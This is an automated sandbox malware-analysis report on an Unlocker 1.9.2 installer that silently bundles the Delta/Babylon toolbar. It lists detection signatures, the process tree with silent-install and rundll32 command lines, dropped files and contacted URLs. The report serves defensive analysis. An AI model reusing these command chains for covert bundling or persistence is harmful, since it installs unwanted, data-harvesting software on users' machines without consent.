Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Unlocker1.9.2.exe

Overview

General Information

Sample Name:Unlocker1.9.2.exe
Analysis ID:810721
MD5:1e02d6aa4a199448719113ae3926afb2
SHA1:f1eff6451ced129c0e5c0a510955f234a01158a0
SHA256:fb6b1171776554a808c62f4045f5167603f70bf7611de64311ece0624b365397
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: rundll32 run dll from internet
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Sample is not signed and drops a device driver
Contains functionality to register a low level keyboard hook
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Stores files to the Windows start menu directory
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
Drops PE files
Tries to load missing DLLs
Creates driver files
Registers a DLL
Creates or modifies windows services
Contains functionality to query network adapater information
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • Unlocker1.9.2.exe (PID: 1500 cmdline: C:\Users\user\Desktop\Unlocker1.9.2.exe MD5: 1E02D6AA4A199448719113AE3926AFB2)
    • DeltaTB.exe (PID: 3540 cmdline: "C:\Users\user\AppData\Local\Temp\DeltaTB.exe" /aflt=babsst /babTrack="affID=122471" /srcExt=ss /instlRef=sst /S /mtb /mds /mhp /mnt MD5: EB2764885565B6C01CB32E5F51F213B3)
      • Setup.exe (PID: 4132 cmdline: "C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe" -xprm="cat=delta" -expg=none /aflt=babsst /babTrack="affID=122471" /srcExt=ss /instlRef=sst /S /mtb /mds /mhp /mnt MD5: 26F6D1B6756A83DE9755A05F7C030D75)
        • rundll32.exe (PID: 1032 cmdline: "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Local\Temp\8A431A~1\IEHelper.dll,UpdateProtectedModeCookieCache URI|http://babylon.com MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • ielowutil.exe (PID: 2192 cmdline: "C:\Program Files (x86)\Internet Explorer\IELowutil.exe" -PID:123 MD5: D1F5C3244A69511CAC88009B71884A71)
        • rundll32.exe (PID: 1252 cmdline: "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Local\Temp\8A431A~1\IEHelper.dll,UpdateProtectedModeCookieCache trkInfo|http://babylon.com MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • setup.exe (PID: 5996 cmdline: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Latest\Setup.exe -latest -trkInfo=[TType:5012_7] -xprm="cat=delta" -expg=none /aflt=babsst /babTrack="affID=122471" /srcExt=ss /instlRef=sst /S /mtb /mds /mhp /mnt MD5: 5790A04F78C61C3CAEA7DDD6F01829D2)
    • regsvr32.exe (PID: 4916 cmdline: C:\Windows\system32\regsvr32.exe" /s "C:\Program Files\Unlocker\UnlockerCOM.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • regsvr32.exe (PID: 2148 cmdline: /s "C:\Program Files\Unlocker\UnlockerCOM.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Data Obfuscation

barindex
Sigma detected: rundll32 run dll from internet
Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Local\Temp\8A431A~1\IEHelper.dll,UpdateProtectedModeCookieCache URI|http://babylon.com, CommandLine: "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Local\Temp\8A431A~1\IEHelper.dll,UpdateProtectedModeCookieCache URI|http://babylon.com, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe" -xprm="cat=delta" -expg=none /aflt=babsst /babTrack="affID=122471" /srcExt=ss /instlRef=sst /S /mtb /mds /mhp /mnt, ParentImage: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe, ParentProcessId: 4132, ParentProcessName: Setup.exe, ProcessCommandLine: "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Local\Temp\8A431A~1\IEHelper.dll,UpdateProtectedModeCookieCache URI|http://babylon.com, ProcessId: 1032, ProcessName: rundll32.exe

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: Unlocker1.9.2.exeReversingLabs: Detection: 55%
Source: Unlocker1.9.2.exeVirustotal: Detection: 43%Perma Link
Antivirus / Scanner detection for submitted sample
Source: Unlocker1.9.2.exeAvira: detected
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Temp\DeltaTB.exeReversingLabs: Detection: 43%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\DeltaTB.exeJoe Sandbox ML: detected
Source: C:\Program Files\Unlocker\UnlockerInject32.exeJoe Sandbox ML: detected
Source: Unlocker1.9.2.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeWindow detected: < &BackI &AgreeCancelNullsoft Install System v2.46 Nullsoft Install System v2.46License AgreementPlease review the license terms before installing Unlocker 1.9.2.Press Page Down to see the rest of the agreement.A. Unlocker End User License AgreementB. Delta Toolbar End User License AgreementA. Unlocker End User License AgreementThis software is provided "as is" without any guarantee made as to its suitability or fitness for any particular use. It may contain bugs so use of this tool is at your own risk. We take no responsibility for any damage that may unintentionally be caused through its use.You may not distribute Unlocker in any form without express written permission of Cedrick Collomb (ccollomb@emptyloop.com)B. Delta Toolbar End User License AgreementYou have the option of installing the Delta Toolbar. By Installing the Delta Toolbar you agree to Delta End-User Licence Agreement and Delta Privacy Statement. You can easily remove this application at any time.o Delta End-User Licence Agreement: http://info.delta-search.com/uninstall/eula.htmlo Delta Privacy Statement http://info.delta-search.com/uninstall/privacy.htmlIf you accept the terms of the agreement click I Agree to continue. You must accept the agreement to install Unlocker 1.9.2.
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile created: C:\Program Files\Unlocker\README.TXTJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\UnlockerJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeDirectory created: C:\Program Files\UnlockerJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeDirectory created: C:\Program Files\Unlocker\Unlocker.exeJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeDirectory created: C:\Program Files\Unlocker\UnlockerDriver5.sysJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeDirectory created: C:\Program Files\Unlocker\UnlockerInject32.exeJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeDirectory created: C:\Program Files\Unlocker\README.TXTJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeDirectory created: C:\Program Files\Unlocker\UnlockerCOM.dllJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeDirectory created: C:\Program Files\Unlocker\Unlocker.urlJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeDirectory created: C:\Program Files\Unlocker\uninst.exeJump to behavior
Source: Binary string: D:\Projects\Setup_9.1.1\Release_Win32\Setup32.pdb source: DeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000000.340600783.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe, 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe.1.dr
Source: Binary string: c:\Documents and Settings\Cedrick\My Documents\Cedrick\Backup Office\My Sources\Visual Studio Projects\Unlocker\Release64\Unlocker.pdb source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.dr
Source: Binary string: C:\projects\meitar-branch\SP_Meitar\Release_Win32\ReportUrlDll.pdb source: setup.exe, 00000006.00000000.352332785.0000000000EE2000.00000002.00000001.01000000.00000012.sdmp, setup.exe, 00000006.00000002.353687641.0000000000EE2000.00000002.00000001.01000000.00000012.sdmp, setup.exe.2.dr
Source: Binary string: D:\Projects\Setup_9.1.0\Release_Win32\IEHelper.pdbp source: DeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, IEHelper.dll.2.dr, IEHelper.dll.1.dr
Source: Binary string: D:\Projects\Babylon\Setup1_Win32\Setup_Stub.pdbN source: Unlocker1.9.2.exe, DeltaTB.exe.0.dr
Source: Binary string: D:\Projects\Setup_9.1.0\Release_Win32\BExternal.pdb source: DeltaTB.exe, 00000001.00000003.361456680.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.351621352.000000000089D000.00000004.00000020.00020000.00000000.sdmp, BExternal.dll.1.dr, BExternal.dll.2.dr
Source: Binary string: D:\Projects\Setup_9.1.1\Release_Win32\Setup32.pdbp;V source: DeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000000.340600783.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe, 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe.1.dr
Source: Binary string: D:\Projects\Babylon\Setup1_Win32\Setup_Stub.pdb source: DeltaTB.exe, 00000001.00000002.363778301.00000000009A4000.00000002.00000001.01000000.00000009.sdmp, DeltaTB.exe, 00000001.00000000.339008902.00000000009A4000.00000002.00000001.01000000.00000009.sdmp, Unlocker1.9.2.exe, DeltaTB.exe.0.dr
Source: Binary string: D:\Projects\Setup_9.1.0\Release_Win32\IEHelper.pdb source: DeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, IEHelper.dll.2.dr, IEHelper.dll.1.dr
Source: Binary string: c:\Documents and Settings\Cedrick\My Documents\Cedrick\Backup Office\My Sources\Visual Studio Projects\Unlocker\Release64\Unlocker.pdbH source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.dr
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeCode function: 0_2_00405302 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00405302
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeCode function: 0_2_00405CD8 FindFirstFileA,FindClose,0_2_00405CD8
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeCode function: 0_2_0040263E FindFirstFileA,0_2_0040263E
Source: C:\Users\user\AppData\Local\Temp\DeltaTB.exeCode function: 1_2_009A121F _wcscpy,_wcscpy,_wcscat,FindFirstFileW,1_2_009A121F
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeCode function: 2_2_0049F0E0 FindFirstFileW,FindClose,2_2_0049F0E0
Source: Joe Sandbox ViewIP Address: 184.154.27.232 184.154.27.232
Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000000.340600783.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe, 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe.1.drString found in binary or memory: http://Kernel32.dllSetDllDirectoryW
Source: Setup.exe, 00000002.00000003.355161642.00000000022A1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.347884515.0000000003415000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.347884515.00000000033FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.347884515.00000000033F0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.348386397.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drString found in binary or memory: http://babylon.com
Source: rundll32.exe, 00000003.00000002.347884515.0000000003415000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.347884515.0000000003428000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://babylon.com/
Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000000.340600783.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe, 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe.1.drString found in binary or memory: http://babylon.com/?hp%d:%d;dsp%d:%d;hpu%d:%s;dspu%d:%s;COO_gcSCOO_scSBTRSCOO_suaopenopenieffcrBUSol
Source: rundll32.exe, 00000003.00000002.347884515.0000000003415000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://babylon.com/C
Source: rundll32.exe, 00000003.00000002.347884515.00000000033FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://babylon.com/les
Source: rundll32.exe, 00000003.00000002.347884515.00000000033FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://babylon.com=
Source: rundll32.exe, 00000003.00000002.347884515.00000000033FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://babylon.comC
Source: rundll32.exe, 00000003.00000002.347849698.0000000003220000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.347884515.00000000033F0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.348337863.0000000000460000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://babylon.comC:
Source: Setup.exe, 00000002.00000003.355252592.00000000022AA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356198792.00000000022B4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360465899.00000000022B6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355592760.00000000022B0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355309073.00000000022AE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355215955.00000000022A6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355161642.00000000022A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://babylon.comGa
Source: rundll32.exe, 00000003.00000002.347884515.00000000033F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://babylon.comz
Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355252592.00000000022AA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345275350.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356198792.00000000022B4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360465899.00000000022B6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342266400.00000000022B7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344418944.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342497747.00000000022BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355592760.00000000022B0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343684462.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355309073.00000000022AE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355215955.00000000022A6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344879058.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355161642.00000000022A1000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drString found in binary or memory: http://bis.babylon.com/
Source: Setup.exe, 00000002.00000003.355252592.00000000022AA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356198792.00000000022B4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360465899.00000000022B6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355592760.00000000022B0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355309073.00000000022AE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355215955.00000000022A6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355161642.00000000022A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bis.babylon.com/F
Source: Setup.exe, 00000002.00000003.355252592.00000000022AA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356198792.00000000022B4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360465899.00000000022B6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355592760.00000000022B0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355309073.00000000022AE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355215955.00000000022A6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355161642.00000000022A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bis.babylon.com/j
Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360465899.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360692910.00000000023A0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345275350.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354723745.00000000022BB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342266400.00000000022B7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344418944.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342497747.00000000022BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343684462.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344879058.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drString found in binary or memory: http://bts.babylon.com/index.php
Source: Setup.exe, 00000002.00000002.360692910.00000000023A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bts.babylon.com/index.php=
Source: Setup.exe, 00000002.00000003.357062888.0000000002340000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drString found in binary or memory: http://clientac.babsrv.com/?f=3&n=10&q=%s&l=%d&t=%d&p=babylon&b=1&callback=acp_new
Source: Setup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drString found in binary or memory: http://clients.babylon.com/eval/kms6.cgi
Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360692910.00000000023A0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345275350.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342266400.00000000022B7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344418944.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342497747.00000000022BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343684462.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344879058.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drString found in binary or memory: http://clients.babylon.com/pro/kms6.cgi
Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355252592.00000000022AA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360465899.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345275350.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354723745.00000000022BB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356198792.00000000022B4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360465899.00000000022B6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342266400.00000000022B7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344418944.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342497747.00000000022BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355592760.00000000022B0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343684462.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355309073.00000000022AE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355215955.00000000022A6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344879058.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355161642.00000000022A1000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drString found in binary or memory: http://clientui.babylon.com/
Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, Unlocker1.9.2.exe, DeltaTB.exe.0.dr, Setup.exe.1.drString found in binary or memory: http://crl.thawte.com/ThawtePCA.crl0
Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, Unlocker1.9.2.exe, DeltaTB.exe.0.dr, Setup.exe.1.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, Unlocker1.9.2.exe, DeltaTB.exe.0.dr, Setup.exe.1.drString found in binary or memory: http://cs-g2-crl.thawte.com/ThawteCSG2.crl0
Source: Setup.exe, 00000002.00000002.360692910.00000000023A0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342266400.00000000022B7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342497747.00000000022BA000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drString found in binary or memory: http://dl.babylon.com/site/files/Setup9/dwr/DefaultClient/DefaultClient/Default-clientdat.zpb;http:/
Source: Setup.exe, 00000002.00000003.357062888.0000000002340000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drString found in binary or memory: http://dl.babylon.com/site/files/Setup9/dwr/DefaultClient/DefaultClient/Default-tbdat.zpb;http://dl.
Source: Setup.exe, 00000002.00000002.359689566.0000000000867000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357162551.0000000002345000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356035345.0000000002322000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356796571.0000000002331000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354921205.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354747612.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354625909.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355334279.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357325041.0000000002367000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356257154.0000000002323000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357274188.0000000002357000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358686150.0000000002386000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356514833.0000000002330000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357844103.0000000002381000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356370103.0000000002329000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357062888.0000000002340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dl.babylon.com/site/files/Setup9/dwr/latest/latest_bl/Setup2.zpb
Source: downloader[1].htm.2.drString found in binary or memory: http://dl.babylon.com/site/files/Setup9/dwr/latest/latest_bl/Setup2.zpb;
Source: Setup.exe, 00000002.00000002.359689566.0000000000867000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dl.babylon.com/site/files/Setup9/dwr/latest/latest_bl/Setup2.zpbZ
Source: Setup.exe, 00000002.00000002.359689566.0000000000867000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dl.babylon.com/site/files/Setup9/dwr/latest/latest_bl/Setup2.zpbi
Source: Setup.exe, 00000002.00000002.359689566.0000000000867000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dl.babylon.com/site/files/Setup9/dwr/latest/latest_bl/Setup2.zpbv
Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360465899.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360692910.00000000023A0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345275350.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354723745.00000000022BB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342266400.00000000022B7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344418944.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342497747.00000000022BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343684462.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344879058.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drString found in binary or memory: http://info.babylon.com/campaigns/
Source: Setup.exe, 00000002.00000002.360692910.00000000023A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://info.babylon.com/campaigns/RM
Source: Setup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drString found in binary or memory: http://info.babylon.com/setup/downloader.php
